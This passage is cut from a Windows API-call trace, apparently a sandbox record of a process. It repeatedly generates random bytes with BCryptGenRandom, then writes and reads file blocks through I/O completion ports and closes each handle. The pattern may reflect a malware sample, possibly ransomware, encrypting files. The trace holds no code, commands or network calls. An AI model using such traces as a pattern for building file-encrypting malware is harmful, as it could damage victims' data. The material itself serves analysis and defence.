lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.502] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.503] CloseHandle (hObject=0x170) returned 1 [0144.503] free (_Block=0x3df0008) [0144.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.513] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.513] free (_Block=0x3e305b8) [0144.513] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.513] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.514] free (_Block=0x1fa91d0) [0144.514] free (_Block=0x1fa2ed8) [0144.514] free (_Block=0x1fa90b8) [0144.514] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.515] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.538] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.539] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.540] CloseHandle (hObject=0x170) returned 1 [0144.540] free (_Block=0x3df0008) [0144.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.551] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.552] free (_Block=0x3e305b8) [0144.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.552] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.552] free (_Block=0x1fa91d0) [0144.552] free (_Block=0x1fa2ed8) [0144.552] free (_Block=0x1fa90b8) [0144.552] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.554] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.555] CloseHandle (hObject=0x170) returned 1 [0144.555] free (_Block=0x3df0008) [0144.555] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.564] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.565] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.565] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.566] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.566] free (_Block=0x3e305b8) [0144.566] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.566] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.566] free (_Block=0x1fa91d0) [0144.566] free (_Block=0x1fa2ed8) [0144.566] free (_Block=0x1fa90b8) [0144.566] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.568] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.579] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x406c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.581] CloseHandle (hObject=0x170) returned 1 [0144.581] free (_Block=0x3df0008) [0144.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.591] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.592] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.592] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.592] free (_Block=0x3e305b8) [0144.592] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.592] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.592] free (_Block=0x1fa91d0) [0144.592] free (_Block=0x1fa2ed8) [0144.592] free (_Block=0x1fa90b8) [0144.592] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.594] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2c50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.609] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4030, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.610] CloseHandle (hObject=0x170) returned 1 [0144.610] free (_Block=0x3df0008) [0144.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.633] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.633] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.633] free (_Block=0x3e305b8) [0144.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.633] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.634] free (_Block=0x1fa91d0) [0144.634] free (_Block=0x1fa2ed8) [0144.634] free (_Block=0x1fa90b8) [0144.634] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0144.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.667] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x3ec0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0144.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.668] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.670] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.670] free (_Block=0x3e305b8) [0144.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.670] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.671] free (_Block=0x1fa91d0) [0144.671] free (_Block=0x1fa2ed8) [0144.671] free (_Block=0x1fa90b8) [0144.671] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0144.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.675] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0144.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.700] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0144.701] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.711] CloseHandle (hObject=0x2a4) returned 1 [0144.712] free (_Block=0x3df0008) [0144.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.725] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd28, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0144.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.740] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2ab4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0144.754] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.765] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2628, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0144.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0144.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.787] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0144.787] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0144.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0144.787] free (_Block=0x3e305b8) [0144.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0144.787] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0144.788] free (_Block=0x1fa91d0) [0144.788] free (_Block=0x1fa2ed8) [0144.788] free (_Block=0x1fa90b8) [0144.788] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0144.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.801] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0144.801] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0144.815] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3094, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0144.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0145.940] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0145.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0145.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0145.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0145.952] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0145.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0145.952] free (_Block=0x3e305b8) [0145.952] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0145.952] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0145.952] free (_Block=0x1fa91d0) [0145.952] free (_Block=0x1fa2ed8) [0145.952] free (_Block=0x1fa90b8) [0145.953] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0145.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0145.963] CloseHandle (hObject=0x2a8) returned 1 [0145.963] free (_Block=0x1ff1e60) [0145.963] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0145.971] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x4f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0145.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.192] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x3a30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 